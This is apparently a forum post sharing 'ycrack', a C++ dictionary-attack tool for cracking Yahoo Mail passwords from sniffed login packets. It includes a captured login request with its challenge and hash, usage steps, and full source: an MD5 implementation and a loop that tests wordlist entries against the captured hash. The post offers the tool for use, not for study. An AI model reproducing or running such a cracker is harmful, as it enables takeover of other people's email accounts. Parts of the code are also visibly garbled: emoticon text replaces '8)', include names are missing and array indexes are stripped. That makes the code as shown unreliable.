For those who have c++ knowledge.. ********************************* usage of the program is: #./ycrack Below is an example login packet. Note the strings following 'challenge=' and 'passwd='; those are what you are looking for. GET /reg/login0/no_suli/login/us/ym/*http://login.yahoo.com/config/login? .tries=1&.src=ym&.md5=&.hash=&.js=1&.last=&promo=&.intl=us&.bypass=& .partner=&.u=08oidol1a8gav&.v=0& .challenge=sHahwb_63ScGiwVT2q5lh7bi1JEv&.yplus=&.emailCode=&pkg=& stepid=&.ev=&hasMsgr=0&.chkP=Y &.done=http%3A//mail.yahoo.com&login=xxxxxxxxxxxxxx &passwd=0c5d98f1305bad4045863f78a335fc30 &.persistent=&.save=1&.hash=1&.md5=1 HTTP/1.1 Host: us.rd.yahoo.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q= 0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://mail.yahoo.com/?.intl=us Cookie: Y=v=1&n=ftsocmdj9pbtu&p= You may use the hashed password and challenge text in this packet to test ycrack (the password used is 'beaver'). Example: #./ycrack 0c5d98f1305bad4045863f78a335fc30 sHahwb_63ScGiwVT2q5lh7bi1JEv english_list.txt The file english_list.txt is the dictionary (text file with one word per line) This program compiles on both Linux and Mcft Windows platforms Tool's Source Code: Quote: /* I'm not the best programmer, and I know this is a bit sloppy, but it works. Feel free to modify/optimize/do whatever you want * with this code, just give me credit if it is due. * * Description: * ycrack performs a dictionary attack on hashed Yahoo mail passwords. See the readme file for more information on Yahoo's * implementation of the MD5 hashing algorithm. Standard MD5 functions are from RSA Data Security. * * Usage: * #./ycrack * * Compilation: * Compiles on both Linux and Windows platforms (tested on Windows XP and Linux 2.4.21) * #g++ ycrack.cpp -o ycrack * * Craig Heffner * (03/06/05) */ ///////////////////////////////////////////////////////////////////////// // // Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All // rights reserved. // // License to copy and use this software is granted provided that it // is identified as the "RSA Data Security, Inc. MD5 Message-Digest // Algorithm" in all material mentioning or referencing this software // or this function. // License is also granted to make and use derivative works provided // that such works are identified as "derived from the RSA Data // Security, Inc. MD5 Message-Digest Algorithm" in all material // mentioning or referencing the derived work. // RSA Data Security, Inc. makes no representations concerning either // the merchantability of this software or the suitability of this // software for any particular purpose. It is provided "as is" // without express or implied warranty of any kind. // These notices must be retained in any copies of any part of this // documentation and/or software. ///////////////////////////////////////////////////////////////////////// #include #include #include #include #include //md5.h file: typedef unsigned int uint4; typedef unsigned short int uint2; typedef unsigned char uchar; char* PrintMD5(uchar md5Digest[16]); char* MD5String(char* szString); char* MD5File(char* szFilename); class md5 { // Methods public: md5() { Init(); } void Init(); void Update(uchar* chInput, uint4 nInputLen); void Finalize(); uchar* Digest() { return m_Digest; } private: void Transform(uchar* block); void Encode(uchar* dest, uint4* src, uint4 nLength); void Decode(uint4* dest, uchar* src, uint4 nLength); inline uint4 rotate_left(uint4 x, uint4 n) { return ((x << n) | (x >> (32-n))); } inline uint4 F(uint4 x, uint4 y, uint4 z) { return ((x & y) | (~x & z)); } inline uint4 G(uint4 x, uint4 y, uint4 z) { return ((x & z) | (y & ~z)); } inline uint4 H(uint4 x, uint4 y, uint4 z) { return (x ^ y ^ z); } inline uint4 I(uint4 x, uint4 y, uint4 z) { return (y ^ (x | ~z)); } inline void FF(uint4& a, uint4 b, uint4 c, uint4 d, uint4 x, uint4 s, uint4 ac) { a += F(b, c, d) + x + ac; a = rotate_left(a, s); a += b; } inline void GG(uint4& a, uint4 b, uint4 c, uint4 d, uint4 x, uint4 s, uint4 ac) { a += G(b, c, d) + x + ac; a = rotate_left(a, s); a += b; } inline void HH(uint4& a, uint4 b, uint4 c, uint4 d, uint4 x, uint4 s, uint4 ac) { a += H(b, c, d) + x + ac; a = rotate_left(a, s); a += b; } inline void II(uint4& a, uint4 b, uint4 c, uint4 d, uint4 x, uint4 s, uint4 ac) { a += I(b, c, d) + x + ac; a = rotate_left(a, s); a += b; } // Data private: uint4 m_State[4]; uint4 m_Count[2]; uchar m_Buffer[64]; uchar m_Digest[16]; uchar m_Finalized; }; //end of md5.h /*Start of MD5 code*/ static unsigned char PADDING[64] = { 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; #define S11 7 #define S12 12 #define S13 17 #define S14 22 #define S21 5 #define S22 9 #define S23 14 #define S24 20 #define S31 4 #define S32 11 #define S33 16 #define S34 23 #define S41 6 #define S42 10 #define S43 15 #define S44 21 // PrintMD5: Converts a completed md5 digest into a char* string. char* PrintMD5(uchar md5Digest[16]) { char chBuffer[256]; char chEach[10]; int nCount; memset(chBuffer,0,256); memset(chEach, 0, 10); for (nCount = 0; nCount < 16; nCount++) { sprintf(chEach, "%02x", md5Digest[nCount]); strncat(chBuffer, chEach, sizeof(chEach)); } return strdup(chBuffer); } // MD5String: Performs the MD5 algorithm on a char* string, returning // the results as a char*. char* MD5String(char* szString) { int nLen = strlen(szString); md5 alg; alg.Update((unsigned char*)szString, (unsigned int)nLen); alg.Finalize(); return PrintMD5(alg.Digest()); } // md5::Init // Initializes a new context. void md5::Init() { memset(m_Count, 0, 2 * sizeof(uint4)); m_State[0] = 0x67452301; m_State[1] = 0xefcdab89; m_State[2] = 0x98badcfe; m_State[3] = 0x10325476; } // md5::Update // MD5 block update operation. Continues an MD5 message-digest // operation, processing another message block, and updating the // context. void md5::Update(uchar* chInput, uint4 nInputLen) { uint4 i, index, partLen; // Compute number of bytes mod 64 index = (unsigned int)((m_Count[0] >> 3) & 0x3F); // Update number of bits if ((m_Count[0] += (nInputLen << 3)) < (nInputLen << 3)) m_Count[1]++; m_Count[1] += (nInputLen >> 29); partLen = 64 - index; // Transform as many times as possible. if (nInputLen >= partLen) { memcpy( &m_Buffer[index], chInput, partLen ); Transform(m_Buffer); for (i = partLen; i + 63 < nInputLen; i += 64) Transform(&chInput); index = 0; } else i = 0; // Buffer remaining input memcpy( &m_Buffer[index], &chInput, nInputLen-i ); } // md5::Finalize // MD5 finalization. Ends an MD5 message-digest operation, writing // the message digest and zeroizing the context. void md5::Finalize() { uchar bits[8]; uint4 index, padLen; // Save number of bits Encode (bits, m_Count, Cool; // Pad out to 56 mod 64 index = (unsigned int)((m_Count[0] >> 3) & 0x3f); padLen = (index < 56) ? (56 - index) : (120 - index); Update(PADDING, padLen); // Append length (before padding) Update (bits, Cool; // Store state in digest Encode (m_Digest, m_State, 16); memset(m_Count, 0, 2 * sizeof(uint4)); memset(m_State, 0, 4 * sizeof(uint4)); memset(m_Buffer,0, 64 * sizeof(uchar)); } // md5::Transform // MD5 basic transformation. Transforms state based on block. void md5::Transform (uchar* block) { uint4 a = m_State[0], b = m_State[1], c = m_State[2], d = m_State[3], x[16]; Decode (x, block, 64); // Round 1 FF (a, b, c, d, x[ 0], S11, 0xd76aa478); FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); FF (c, d, a, b, x[ 2], S13, 0x242070db); FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); FF (d, a, b, c, x[ 5], S12, 0x4787c62a); FF (c, d, a, b, x[ 6], S13, 0xa8304613); FF (b, c, d, a, x[ 7], S14, 0xfd469501); FF (a, b, c, d, x[ 8], S11, 0x698098d8); FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); FF (c, d, a, b, x[10], S13, 0xffff5bb1); FF (b, c, d, a, x[11], S14, 0x895cd7be); FF (a, b, c, d, x[12], S11, 0x6b901122); FF (d, a, b, c, x[13], S12, 0xfd987193); FF (c, d, a, b, x[14], S13, 0xa679438e); FF (b, c, d, a, x[15], S14, 0x49b40821); // Round 2 GG (a, b, c, d, x[ 1], S21, 0xf61e2562); GG (d, a, b, c, x[ 6], S22, 0xc040b340); GG (c, d, a, b, x[11], S23, 0x265e5a51); GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); GG (a, b, c, d, x[ 5], S21, 0xd62f105d); GG (d, a, b, c, x[10], S22, 0x2441453); GG (c, d, a, b, x[15], S23, 0xd8a1e681); GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); GG (d, a, b, c, x[14], S22, 0xc33707d6); GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); GG (b, c, d, a, x[ 8], S24, 0x455a14ed); GG (a, b, c, d, x[13], S21, 0xa9e3e905); GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); GG (c, d, a, b, x[ 7], S23, 0x676f02d9); GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); // Round 3 HH (a, b, c, d, x[ 5], S31, 0xfffa3942); HH (d, a, b, c, x[ 8], S32, 0x8771f681); HH (c, d, a, b, x[11], S33, 0x6d9d6122); HH (b, c, d, a, x[14], S34, 0xfde5380c); HH (a, b, c, d, x[ 1], S31, 0xa4beea44); HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); HH (b, c, d, a, x[10], S34, 0xbebfbc70); HH (a, b, c, d, x[13], S31, 0x289b7ec6); HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); HH (b, c, d, a, x[ 6], S34, 0x4881d05); HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); HH (d, a, b, c, x[12], S32, 0xe6db99e5); HH (c, d, a, b, x[15], S33, 0x1fa27cf8); HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); // Round 4 II (a, b, c, d, x[ 0], S41, 0xf4292244); II (d, a, b, c, x[ 7], S42, 0x432aff97); II (c, d, a, b, x[14], S43, 0xab9423a7); II (b, c, d, a, x[ 5], S44, 0xfc93a039); II (a, b, c, d, x[12], S41, 0x655b59c3); II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); II (c, d, a, b, x[10], S43, 0xffeff47d); II (b, c, d, a, x[ 1], S44, 0x85845dd1); II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); II (d, a, b, c, x[15], S42, 0xfe2ce6e0); II (c, d, a, b, x[ 6], S43, 0xa3014314); II (b, c, d, a, x[13], S44, 0x4e0811a1); II (a, b, c, d, x[ 4], S41, 0xf7537e82); II (d, a, b, c, x[11], S42, 0xbd3af235); II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); II (b, c, d, a, x[ 9], S44, 0xeb86d391); m_State[0] += a; m_State[1] += b; m_State[2] += c; m_State[3] += d; memset(x, 0, sizeof(x)); } // md5::Encode // Encodes input (uint4) into output (uchar). Assumes nLength is // a multiple of 4. void md5::Encode(uchar* dest, uint4* src, uint4 nLength) { uint4 i, j; assert(nLength % 4 == 0); for (i = 0, j = 0; j < nLength; i++, j += 4) { dest[j] = (uchar)(src & 0xff); dest[j+1] = (uchar)((src >> Cool & 0xff); dest[j+2] = (uchar)((src >> 16) & 0xff); dest[j+3] = (uchar)((src >> 24) & 0xff); } } // md5::Decode // Decodes input (uchar) into output (uint4). Assumes nLength is // a multiple of 4. void md5::Decode(uint4* dest, uchar* src, uint4 nLength) { uint4 i, j; assert(nLength % 4 == 0); for (i = 0, j = 0; j < nLength; i++, j += 4) { dest = ((uint4)src[j]) | (((uint4)src[j+1])< \n"); return 0; } crypt=argv[1]; //password hash challenge=argv[2]; //challenge text file=argv[3]; //word file FILE *f; f=fopen(file,"r"); //open word list if(!f){printf("\nError opening file %s\n",file);return 0;} do{ //read each word into variable 'string' c=fscanf(f,"%s",test); string=test; printf("Trying:%s\n",string); hash1=MD5String(string); //get MD5 hash of the password memcpy(&stuff[0],hash1,32); //copy the hashed password into stuff memcpy(&stuff[32],challenge,2Cool; //append challenge text onto the end of the password hash memcpy(&stuff[60],"",3); //clear extra characters inserted by memcpy hash2=MD5String(stuff); //calculate final hash if(strcmp(crypt,hash2)==0){ //compare hash2 to the captured hash printf("\nThe Yahoo password is: %s\n",string); fclose(f); return 0;} }while(c!=EOF); //read until End Of File fclose(f); printf("\nPassword not found!\n"); return 0; }